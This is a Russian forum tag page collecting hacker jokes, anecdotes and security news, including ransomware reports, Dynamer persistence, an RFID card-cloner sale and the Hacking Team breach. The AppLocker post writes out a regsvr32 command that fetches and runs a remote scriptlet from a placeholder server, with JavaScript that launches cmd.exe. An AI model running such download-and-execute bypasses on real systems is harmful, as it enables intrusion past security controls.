хакер

Постов: 26 Рейтинг: 50927
2153

Российский специалист получил самый крупный гонорар от Facebook

Развернуть
Российский специалист получил самый крупный гонорар от Facebook
Социальная сеть Facebook наградила россиянина Андрея Леонова за найденную уязвимость в безопасности сайта. «Брешь» в безопасности получила статус критической.

Андрей выяснил, что Facebook использует уязвимые версии сервиса ImageMagick. Это программный пакет для предварительной обработки изображений перед публикацией, использующийся во многих популярных сайтах. Используя брешь в безопасности, злоумышленники могли на удаленном сервере выполнять любые команды, «спрятав» код в файле изображения.
Уязвимость обнаружили и устранили еще в мае 2016 года. Однако в ноябре Андрею удалось обойти защиту Facebook. Он сразу сообщил об опасности администрации соцсети, через два дня проблему устранили.

Адрей рассказал о своей находке:


Награда

Ошибке присвоили статус критической. Андрей получил самое крупное вознаграждение от Facebook — 40 тысяч долларов или 2 млн 400 тысяч рублей. О своей находке Андрей рассказал в личном блоге.

Андрей Леонов также ответил на несколько вопросов:

- Сколько времени ушло на поиск уязвимости?
- Честно говоря, сложный вопрос. После того, как я попал на страницу, где был уязвимый скрипт — ну может быть минут двадцать-тридцать на все проверки. Но тот факт, что я вообще туда попал — это случайность. До этого где-то с пару часов проверял другой сервис и уже с него попал на facebook.

- Какие инструменты использовались для поиска?
- Стандарные — браузер, burp suite (прим. редакции — ПО для тестирования безопасности веб-приложений), руки, голову и знания :)
1471

Срываем покровы

Развернуть
- Откуда Санта всё о нас знает?
- Санта - русский хакер.
Срываем покровы
3791

Мама, я не на*ер, я хакер!

Развернуть
В тему о тамогочи:
В пору, когда Тамогочи были на пике своей популярности - у меня тамогочи не было, так что я ходил с завистью ко всем своим друзьям. Спустя какое-то время, когда тамогочи были почти у всех - появился он и у меня, но мне было дико завидно, что у всех они уже выросли, а мне ещё предстоят хлопоты с какашками-едой-уборкой (мне сейчас 30 и у меня уже есть настоящий тамогочи).

Я стал думать - как бы ускорить рост - и таки додумался. Достаточно было просто переводить часы на 23:59 в тамогочи и день у него заканчивался, шкала роста росла. Тамогочи рос как на дрожжах! Правда нужно было его хорошенько покормить перед хаком, а то мог окочуриться! Буквально за вечер я "прокачал" на максимум. Все мои друзья были в шоке - как же я так быстро смог вырастить.

В свои 8 лет я почувствовал себя Кевином Митником!
435

Хакерша из Казахстана признана "Человеком года"

Развернуть
Создавшая пиратский сайт казахстанка стала «Человеком года» по версии Nature

Известный журнал Nature опубликовал рейтинг самых влиятельных людей в области науки. На первом месте оказался создатель пиратского портала научных статей казахстанка Александра Элбакян. Именно она создала Sci-Hub, нарушающий авторские права многих ученых.


Ежегодно редакция подводит итоги и публикует списки самых влиятельных людей в области науки.

В этом году список возглавила Элбакян, представляющая интересы казахстанско-российского общества. Биолог прославилась созданием пиратского интернет-портала Sci-Hub. Он был создан еще в 2011 году по причине необходимости платить за доступ к научным публикациям, пишет Vistanews.

Она акцентировала внимание на том, что далеко не каждый может позволить себе подписки на дорогостоящие научные журналы. Благодаря сервису Sci-Hub ученые со всего мира могут следить за интересной информацией, открытиями и мнениями специалистов. Каждый месяц там публикуется около 40 тысяч статей различного направления.

Ранее в рейтинге оказались российские ученые Михаил Еремец и Александр Дроздов. Они прославились благодаря обнаружению сверхпроводящего эффекта сероводорода. Результаты этого года стали основной темой обсуждения научного сообщества.
Хакерша из Казахстана признана
пруф:
1719

Как я со взломщиком компа боролся...

Развернуть
Ситуация случилась буквально вчера.
Сижу за компом никого не трогаю, читаю Пикабу. Замечаю внезапно, что курсор мыши дернулся, как будто мышкой повели, хотя мышь не трогал. Ну, думаю, случайность...

Потом ещё и ещё, с моей стороны это выглядит, как будто кто-то удалённо зашел на мой рабочий стол и что-то делает. По работе часто захожу по Амми и Тимвиверу и знаю, как это выглядит - краткие рваные движения, когда ты не управляешь компом, а что-то делаешь в интерфейсе программы мимолётом пролетев по экрану подключения.

Тут я немного отложил кирпичей, запускаю диспетчер задач, начинаю искать в процессах подозрительные закрывать. ВНЕЗАПНО мышь перестаёт меня слушаться вообще, закрывает диспетчер, чего-то начинает делать в интерфейсе, настройки какие-то открывать! Я в панике! Завод по производству кирпичей работает по полную силу!

Ребутаю насильно комп, пытаясь в судорогах выработать план действий по предотвращению удалённого доступа и оценивая какую конфиденциальную информацию мог стырить злоумышленник (кейлоггер там или ещё какая хрень). Жена заметила, что что-то не так и озабоченно спрашивает "Что случилось?", а мне стыдно, что я крутой IT-шник пропустил вирусятину с неизвестным ещё результатом...

Комп почти загрузился, и тут я вспоминаю, что месяц назад заменил проводную клавиатуру на беспроводной комплект клава+мышь. Клавиатуру-то я использую, а мышь оставил старую - проводную. А беспроводная без дела лежала на столе.
Лежала, а сейчас не лежит. Поворачиваю голову и вижу, как моя годовалая дочка вовсю играется с этой беспроводной мышкой...
Как я со взломщиком компа боролся...
Уж не знаю, как дочь умудрилась включить мышь, но нервишки мне подпортило знатно, а уж стыдно-то как... Жена сидит рядом и ржёт надо мной...

П.С. Мышь спрятал подальше от греха :)
3451

Бесплатный доступ хакер

Развернуть
Бесплатный доступ хакер
Ну в общем на самом флаере все написано. Количество активаций не ограничено.
2106

Сбербанк

Развернуть
В Сбербанке сейчас появилась возможность сформировать код в мобильном приложении и снять деньги в банкомате без карты.
Так вот на днях был на свидании с девушкой, познакомились в интернете. Забыл карту дома, ну и решил удивить ее, как в достык плазе (это у нас ТРЦ) был банкомат сберовский. Когда ввел код, на удивлённый вопрос девушки сказал, что я хакер (дернул черт за язык) и довольный собой догулял с ней вечер.
Так вот! Она написала на меня заявление, что я жулик и граблю банкоматы.
Больше не знакомлюсь в интернете))
940

Пузатый хакер

Развернуть
После 4х часового прогуливания по ВДНХ, захотелось проследовать до туалету, фигня вопрос, везде же натыканы волшебные электронные туалеты, благо карточка этого славного заведения с положительным балансом валялась в кошельке на черный день, который похоже грозился вот вот начаться если не проникну в кабину. Приложил ее к считывателю понял что это фиговина не собирается меня пускать внутрь, она вообще не реагировала что к ней что то прикладывали. В голове началась паника и поиск кустов и расчет хватит ли у меня бабла если буду схвачен за процессом доблестной милицией, как вдруг рядом появился пузатенький мужичек с авоськой и сказал что он обслуживающий персонал(выглядел он как сосед Миша вышедшей за литрушкой пиваса в труселях) и что часто бывает но я человек с виду хороший и он готов помочь, помощь стоит правда 50 рублей, фигня вопрос чуть не проорал я, давай! не томи! Он нажал или приложил что то, не обратил внимание, вызвал Админ панель туалета ввел логин 100 пароль вроде 1001 и дверь отворилась. Вот так в кризис выживают туалетные Админы или Хакеры.
230

ВНИМАНИЕ! Опасный вирус-шифровальщик для 1С

Развернуть
Антивирусная компания "Доктор Веб" сообщила 22 июня 2016 г. о том, что выявлен опасный вирус для 1С:Предприятия – троянец, запускающий шифровальщика-вымогателя.

Троянец распространяется в виде вложения в сообщения электронной почты с темой «У нас сменился БИК банка» и следующим текстом:

К письму прикреплен файл внешней обработки для программы «1С:Предприятие» с именем ПроверкаАктуальностиКлассификатораБанков.epf. Тело этого модуля защищено паролем, поэтому просмотреть его исходный код стандартными средствами невозможно. Если получатель такого письма последует предложенным инструкциям и откроет этот файл в программе «1С:Предприятие», на экране отобразится диалоговое окно.
Какую бы кнопку ни нажал пользователь, 1C.Drop.1 будет запущен на выполнение, и в окне программы «1С:Предприятие» появится форма с изображением забавных котиков.

В это же самое время троянец начинает свою вредоносную деятельность на компьютере. В первую очередь он ищет в базе 1С контрагентов, для которых заполнены поля с адресом электронной почты, и отправляет по этим адресам письмо с собственной копией. Текст сообщения идентичен приведенному выше. Вместо адреса отправителя троянец использует e-mail, указанный в учетной записи пользователя 1С, а если таковой отсутствует, вместо него подставляется адрес 1cport@mail.ru. В качестве вложения троянец прикрепляет к письму файл внешней обработки с именем ОбновитьБИКБанка.epf, содержащий его копию. Пользователи, попытавшиеся открыть такой файл в приложении 1С, также пострадают от запустившегося на их компьютере шифровальщика, однако эта копия 1C.Drop.1 разошлет по адресам контрагентов поврежденный EPF-файл, который программа «1С:Предприятие» уже не сможет открыть. 1C.Drop.1 поддерживает работу с базами следующих конфигураций 1С:

"Управление торговлей, редакция 11.1"
"Управление торговлей (базовая), редакция 11.1"
"Управление торговлей, редакция 11.2"
"Управление торговлей (базовая), редакция 11.2"
"Бухгалтерия предприятия, редакция 3.0"
"Бухгалтерия предприятия (базовая), редакция 3.0"
"1С:Комплексная автоматизация 2.0"

После завершения рассылки 1C.Drop.1 извлекает из своих ресурсов, сохраняет на диск и запускает троянца-шифровальщика Trojan.Encoder.567. Этот опасный энкодер, имеющий несколько модификаций, шифрует хранящиеся на дисках зараженного компьютера файлы и требует выкуп за их расшифровку. К сожалению, в настоящее время специалисты компании «Доктор Веб» не располагают инструментарием для расшифровки файлов, поврежденных этой версией Trojan.Encoder.567, поэтому пользователям следует проявлять особую бдительность и не открывать полученные по электронной почте файлы в приложении «1С:Предприятие», даже если в качестве адреса отправителя значится адрес одного из известных получателю контрагентов.



1483

В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду

Развернуть
Многие наверняка помнят , широко обсуждавшуюся в рунете прошлой зимой. Тогда сотрудник «Лаборатории Касперского» Олег Горобец заметил в метро человека с подозрительным устройством. По мнению специалиста, тот мог сканировать одежду и сумки пассажиров, в надежде поживиться данными о банковских картах с RFID чипами. Хотя тогда большинство участников дискуссии сочли, что Горобец принял за злоумышленника обычного курьера с терминалом оплаты, такой вид мошенничества действительно существует. Так, издание Softpedia , что группа хакеров The CC Buddies продает в даркнете новый девайс, который способен клонировать 15 банковских карт в секунду с расстояния в восемь сантиметров.
В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду
Популярность такого рода мошенничества растет прямо пропорционально количеству карт с RFID чипами у населения. Похоже, скоро человек, тесно прижимающийся к другим пассажирам в общественном транспорте, будет вызвать мысли вовсе не об извращенцах, а о кардерах.

The CC Buddies назвали свое устройство Contactless Infusion X5 и уверяют, что с ним атакующему даже не придется ни к кому прижиматься – достаточно просто пройти сквозь толпу, к примеру, в подземке или на концерте. Находясь на достаточно близком расстоянии, девайс копирует данные с современных бесконтактных карт и записывает их во внутреннее хранилище. Впоследствии злоумышленник подключит прибор к компьютеру через USB-порт, а специальное приложение, которое The CC Buddies продают в комплекте с устройством, позволит извлечь украденную информацию. Немаловажен и тот факт, что прибор весит всего 70 граммов, а его размеры более чем скромны: 98 x 65 x 12,8 мм.
— пишут создатели устройства в своем объявлении.

Contactless Infusion X5 собирает данные о номере карты и сроке ее действия. Если RFID чип карты также содержит и другие данные, будь то имя владельца, его адрес или выписка о последних операциях по счету, прибор похитит и эту информацию. Создатели устройства утверждают, что оно читает данные о любых карт на частоте 13,56 МГц.

Информацию о картах Contactless Infusion X5 хранит в зашифрованном виде. Программа, которую предоставляют злоумышленники, позволит расшифровать данные и скачать их на компьютер, работающий под управлением Windows XP или выше. Затем можно приступать к печати фальшивых копий. Пока ПО хакерской группы работает только с банковскими картами, но в будущем авторы обещают расширить его функциональность.
В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду
Свое устройство The CC Buddies оценили в 1,2 биткоина (порядка $825 по текущему курсу). Девайсы покупателям будут отправлены обычной почтой. В комплекте с каждым устройством поставляется кабель USB 3.0 для зарядки и передачи данных, специальный софт, а также 20 чистых «болванок» для изготовления банковских карт. Сообщается, что три часа подзарядки гарантируют десять часов работы устройства. Ниже можно ознакомиться с полными техническими характеристиками Contactless Infusion X5.
В даркнете продают устройство, которое делает 15 клонов бесконтактных карт в секунду
6392

Северокорейский клон Facebook был взломан 18-летним шотландцем при помощи логина «admin» и пароля «password»

Развернуть
Северокорейский клон Facebook был взломан 18-летним шотландцем при помощи логина «admin» и пароля «password»
117

Шифровальщик PETYA объединился с вымогателем MISCHA

Развернуть
Разработчики вредоносного ПО, по всей видимости, решили, что два вымогателя лучше, чем один и оптимизировали механизм доставки своей малвари. Теперь шифровальщик Petya поставляется «в комплекте» с аналогичным зловредом Mischa, который вступает в игру, если Petya потерпел фиаско.
Шифровальщик PETYA объединился с вымогателем MISCHA
Криповымогатель Petyaс марта 2016 года. От общей массы шифровальщиков его отличает то, что Petya полностью лишает пользователя доступа к жесткому диску. Дело в том, что Petya проникает в Master Boot Record и препятствует загрузке ОС, а также шифрует Master File Table, или главную таблицу файлов.
В апреле 2016 года исследователь, известный под псевдонимом Лео Стоун (Leo Stone) дешифровки файлов, пострадавших в ходе атак Petya. Судя по отзывам пострадавших, способ Стоуна действительно работал. Что, очевидно, и побудило автора малвари создать улучшенную версию.
Шифровальщик PETYA объединился с вымогателем MISCHA
Специалисты MalwareHunterTeam обнаружили, что теперь установщик Petya поставляется со вторым, резервным шифровальщиком в комплекте, который получил имя Mischa. Исследователи BleepingComputer, в свою очередь, , что Petya по-прежнему нужны привилегии администратора в системе. То есть если жертва отказывается выдать вредоносу права: он бессилен. Именно на такой случай и нужен Mischa. Второму вымогателю не требуются права администратора, он и без них зашифрует файлы по классической схеме, используя алгоритм AES, но не затрагивая MBR.

Пара шифровальщиков Petya и Mischa распространяется преимущественно через фишинговые письма, замаскированные под заявки о поступлении на работу. Такие сообщения якобы содержат ссылку на резюме соискателя, которое на самом деле оказывается файлом вида PDFBewerbungsmappe.exe. Когда жертва запускает такой файл, начнется установка Petya, и появится запрос прав администратора. Если установить Petya не удалось, сработает Mischa. Демонстрацию процесса заражения можно увидеть на видео ниже.
Mischa шифрует не только стандартные типы файлов (изображения, документы и так далее), но также файлы .exe. Вымогатель не затрагивает только директории \Windows, \$Recycle.Bin, \Microsoft, \Mozilla Firefox, \Opera, \Internet Explorer, \Temp, \Local, \LocalLow и \Chrome.

На сегодня злоумышленники требуют от своих жертв выкуп в размере 1,93 биткоина (порядка $875 по текущему курсу).

1685

Хакеры эксплуатируют "пасхалку" в WINDOWS для внедрения вирусни

Развернуть
Специалисты McAfee Labs обнаружили новое семейство малвари — Dynamer. Авторы вредоноса используют для атак секретную функцию «режим бога» (GodMode), которая впервые появилась в операционных системах Microsoft во времена Windows Vista.
Хакеры эксплуатируют
О существовании функции GodMode известно давно. Чтобы активировать «режим бога» в Windows, нужно осуществить всего пару простых операций. Необходимо создать на рабочем столе новую папку с именем вида GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}. «GodMode» при этом можно заменить любым другим набором символов, а вот дальнейшую последовательность изменять нельзя.

В созданной папке будут отображаться все доступные пользователю настройки ОС, в том числе и те, которые не входят в меню «Панели управления» и «Параметров». Предполагается, что это не просто «пасхалка», а функция, которую разработчики Microsoft используют для дебаггинга.

Исследователи McAfee Labs обнаружили, что бекдор Dynamer использует GodMode для атак. Чтобы закрепиться в системе, малварь создает в реестре Windows запись, благодаря которой вредоносный процесс стартует при каждом запуске системы. Запись в реестре выглядит следующим образом:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
lsm = C:\Users\admin\AppData\Roaming\com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}\lsm.exe

Dynamer помещается в папку com4, внутри %AppData%. Данная запись в реестре использует чуть измененную версию «режима бога», что позволяет малвари нормально функционировать, но если попытаться открыть папку com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}, произойдет автоматическая переадресации в RemoteApp and Desktop Connections.
Хакеры эксплуатируют
Как можно заметить, путь GodMode немного изменен, чтобы указывать непосредственно на RemoteApp and Desktop Connections. Замена имени «GodMode» на «com4» обусловлена желанием хакеров остаться в системе навсегда. Именно из-за этого нюанса от Dynamer крайне трудно избавиться.

«Использовать такое имя в нормальном Windows Explorer и cmd.exe запрещено. Операционная система будет относиться к такой папке как к устройству, что помешает пользователю удалить данную директорию через “Проводник” или командную строку», — поясняет Крейг Шмугар (Craig Schmugar).
Хакеры эксплуатируют
Хакеры эксплуатируют
Специалисты McAfee Labs всё же придумали способ избавления от вредоносной папки. Для этого понадобится выполнить команду:

> rd “\\.\%appdata%\com4.{241D7C96-F8BF-4F85-B01F-E2B043341A4B}” /S /Q
McAfee Labs 
Пост 
371

Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ

Развернуть
Независимый исследователь Кейси Смит (Casey Smith) обнаружил интересный способ обхода средства безопасности Windows AppLocker. Техника Смита не требует привилегий администратора. Всё, что понадобится для атаки, это лишь короткая команда, код которой уместится даже в один твит.
Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ
Windows AppLocker впервые появился в системах Microsoft с релизом Windows Server 2008 R2 и Windows 7. По сути, эта функция позволяет администратору задавать определенные правила для приложений, определяя, что может и чего не может запустить пользователь (или группа пользователей). К примеру, можно запретить запуск на компьютере любых программ, которые не относятся к рабочей деятельности сотрудника.

Тогда как администраторы привыкли доверять AppLocker, Кейсти Смит пишет, что обойти его ограничения возможно, более того, проделать это весьма легко.

Фактически Смит предложил использовать не по назначению Regsvr32 и с его помощью скачать из интернета определенный файл. Для этого потребуется команда вида:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Исполнение этой команды приведет к скачиваю XML-файла, который приведет к запуску cmd.exe. Кроме того, cmd.exe можно заменить на любую другую программу, и не важно, какие ограничения установлены в AppLocker: программа всё равно успешно запустится.

Как это работает? Regsvr32 является частью ОС и может использоваться для регистрации или отмены регистрации файлов COM скриптов в реестре Windows. Если разбирать команду Смита: /s в коде обязывает Regsvr32 работать тихо, /n приказывает не использовать DllRegisterServer, /u означает, что мы пытаемся осуществить отмену регистрации, а параметр /i отвечает за ссылку и DLLinstall. В свою очередь, scrobj.dll – это Script Component Runtime.

Смит обнаружил, что Regsvr32 обработает URL и доставит на машину заданный файл через HTTP или HTTPS. Исследователь добавил немного JavaScript к своему XML-файлу и инициировал его исполнение через запрос на отмену регистрации .DLL. Таким образом, обход AppLocker становится весьма простым трюком, веь любой пользователь может отправить запрос на отмену регистрации.

Так, в описанном выше примере JavaScript использует ActiveX:

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

Атака Смита не требует привилегий администратора, может быть выдана за обычную сессию HTTP, и не должна оставить ни единого следа на жестком диске жертвы, так как не затрагивает реестр и работает непосредственно с памятью. Никаких патчей на данный момент не существует, разве что Regsvr32 можно отрезать от интернета при помощи файервола.

Исследователь опубликовал на GitHub свой proof-of-concept, который может пригодиться системным администраторам и пентестерам.
Команда для обхода WINDOWS APPLOCKER умещается в один ТВИТ
Материалы:
Windows AppLocker 
Кейсти Смит пишет об обходе http://subt0x10. блогспот .ru/2016/04/bypass-application-whitelisting-script.html
Regsvr32 
XML-файл запускающий cmd.exe 
Как параметр /i отвечает за ссылку и DLLinstall 
Proof-of-conceptна исследователя на GitHub 
Пруф 
1132

Хакер в подробностях рассказал как он взломал HACKING TEAM

Развернуть
Хакер в подробностях рассказал как он взломал HACKING TEAM
Спустя почти год после скандального взлома Hacking Team и утечки 400 Гб внутренних данных () компании, появился человек, взявший ответственность за случившееся на себя. В минувшие выходные на Paste Bin был опубликован объемный текст, автором которого выступил хакер, известный как Финиас Фишер (Phineas Fisher). Фишер в деталях рассказал о том, как он самостоятельно взломал Hacking Team, какие техники и инструменты для этого использовал, а также объяснил, зачем это сделал.

Итальянская компания Hacking Team прославилась на весь мир летом 2015 года, когда неизвестные взломали её и опубликовали в интернете более 400 Гб внутренних файлов (от исходного кода, до документов и почтовой переписки сотрудников). До этого момента о деятельности Hacking Team было известно немного, но после утечки данных весь мир смог в деталях ознакомиться с тем, как работают компании, создающие инструменты для массовой слежки, разрабатывающие различные эксплоиты и софт на грани легального.
Хакер в подробностях рассказал как он взломал HACKING TEAM
Хотя после взлома на всеобщее обозрение выплыли различные факты, часть из которых откровенно порочила репутацию Hacking Team (к примеру, сотрудничество с Ливией, Суданом, Эфиопией и другими странами, властям которых определенно не стоило продавать глобальный шпионский софт), руководство компании попыталось оправдаться и принести извинения. В итоге, как это ни странно, Hacking Team не слишком пострадала в результате этого скандала и, по последним данным, даже осталась на плаву. Тем не менее, кто взломал одного из крупнейших поставщиков продукции для спецслужб, так и осталось неясно.
Хакер в подробностях рассказал как он взломал HACKING TEAM
Публикация Финиаса Фишера написана в духе мануала для начинающих хакеров. Он не только рассказывает о взломе Hacking Team, но читает настоящую лекцию об информационной безопасности в целом, рассказывая обо всём, начиная практически с самых азов. Фишер, в частности, пишет о том, почему использование Tor – это не панацея, учит правильно пользоваться поиском Google (как это делают пентестеры), а также объясняет, как правильно собирать личные данные о жертве и применять социальную инженерию. Крайне рекомендуем ознакомиться с полной версией текста на PasteBin, а в этой заметке мы всё же сконцентрируемся на взломе Hacking Team.

Фишер утверждает, что входной точкой его атаки стало некое «встроенное устройство» подключенное к внутренней сети Hacking Team. Хакер не раскрывает подробностей о том, что это было за устройство, зато он отмечает, что обычно найти точку проникновения гораздо легче. Дело в том, что специально для атаки Фишер нашел 0-day в этом «встроенном устройстве», создал собственную прошивку для него и оснастил ее бэкдором. Хакер пишет, что на создание удаленного root-эксплоита у него ушло две недели, а также отказывается раскрывать данные о природе самой 0-day уязвимости. Фишер объясняет своё нежелание тем, что баг до сих пор не исправлен.

Проникнув в сеть Hacking Team, Фишер какое-то время наблюдал и собирал данные. Он написал ряд собственных инструментов для атаки, и использовал свой эксплоит всего раз – для внедрения в сеть, а затем возвращался в систему уже через оставленный там бэкдор. Также при проведении опытов было важно не дестабилизировать систему и не выдать своего присутствия, поэтому несколько недель Фишер тренировался и проверял все подготовленные инструменты, эксплоит и бэкдор в сетях других уязвимых компаний. Для последующего изучения сети Hacking Team Фишер использовал busybox, nmap, Responder.py, tcpdump, dsniff, screen и другие тулзы.
Хакер в подробностях рассказал как он взломал HACKING TEAM
Потом Фишеру повезло. Он обнаружил пару уязвимых баз MongoDB сконфигурированных совершенно неправильно. Именно здесь хакер нашел информацию о бэкапах компании, а затем добрался и до самих бэкапов. Самой полезной его находкой стал бэкап почтового сервера Exchange. Фишер принялся прицельно искать в нем информацию о паролях или хешах, которые моги бы предоставить ему доступ к «живому» серверу. Для этого он использовал pwdump, cachedump и lsadump, и удача снова ему улыбнулась. Фишер обнаружил учетные данные аккаунта администратора BES (BlackBerry Enterprise Server). Данные оказались действительны, что позволило Фишеру повысить свои привилегии в системе, в итоге получив пароли других пользователей компании, включая пароль администратора домена.
Хакер в подробностях рассказал как он взломал HACKING TEAM
На этом этапе Фишер уже опасался, что его присутствие вот-вот заметят, поэтому принялся срочно скачивать информацию с почтового сервера компании. Однако хакера никто так и не обнаружил.

Изучив похищенные письма и документы, Фишер заметил, что пропустил кое-что важное – «Rete Sviluppo», изолированную сеть внутри основной сети Hacking Team, где команда хранила исходные коды своего RCS (Remote Control System), то есть шпионского ПО для слежки за пользователями. Рассудив, что у сисадминов должен быть доступ к этой сети, Фишер (уже обладающий привилегиями администратора домена) проник на компьютеры Мауро Ромео (Mauro Romeo) и Кристиана Поцци (Christian Pozzi). На их машины он подсадил кейлоггеры, софт, делающий снимки экрана, поработал с рядом модулей metasploit, а также просто изучил содержимое компьютеров. В системе Поцци обнаружился Truecrypt-том, и Фишер терпеливо дождался, пока разработчик его смонтирует, а затем скопировал оттуда все данные. Среди файлов с зашифрованного тома обнаружился обычный файл .txt с кучей разных паролей. Нашелся там и пароль от сервера Fully Automated Nagios, который имел доступ к закрытой сети Sviluppo для мониторинга. Фишер нашел то, что искал.

Кроме того, просматривая похищенную почту, хакер обнаружил, что одному из сотрудников дали доступ к репозиториям компании. Так как Windows-пароль сотрудника был уже известен Фишеру, он попробовал применить его же для доступа к git-серверу. И пароль сработал. Тогда Фишер попробовал sudo, и всё вновь сработало. Для доступа к серверу GitLab и Twitter-аккаунту Hacking Team взломщик вообще использовал функцию «я забыл пароль», в сочетании с тем фактом, что он имел свободный доступ к почтовому серверу компании.

На этом Фишер счел компрометацию Hacking Team окончательной и всецелой. Он пишет:
В конце Фишер отмечает, что он хотел бы посвятить данный взлом и этот подробный гайд многочисленным жертвам итальянских фашистов. Он заявляет, что компания Hacking Team, ее глава Давид Винченцетти (David Vincenzetti), давняя дружба компании с правоохранительными органами – всё это части давно укоренившейся в Италии традиции фашизма. После таких заявлений мотивы Фишера, который пишет о себе как о «этичном хакере», становятся вполне ясны.
Хакер в подробностях рассказал как он взломал HACKING TEAM
Материалы:

Hacking Team в Twitter
Пруф
На хабре 

Ссылку на PasteBin добавить не могу, т.к. домен тут считается запрещенным.
1141

Мне вот интересно, что за хакер, который чуть не сделал мне личную жизнь?

Развернуть
Мне вот интересно, что за хакер, который чуть не сделал мне личную жизнь?
2491

SeReGa H@CK3R

Развернуть
Оригинал и полная история тут https://vk.com/iprxy?w=wall19772489_28636
SeReGa H@CK3R
1355

То чувство, когда устанавливаешь бабушке teamviewer, подключаешься к ее компу и помогаешь с неработающими одноклассничками.

Развернуть
Как же забавно старики реагируют на такие простые для нас вещи... :)
То чувство, когда устанавливаешь бабушке teamviewer, подключаешься к ее компу и помогаешь с неработающими одноклассничками.
964

Нео и прекрасный хакер

Развернуть
3467

Шах и мат хакеры.

Развернуть
Шах и мат хакеры.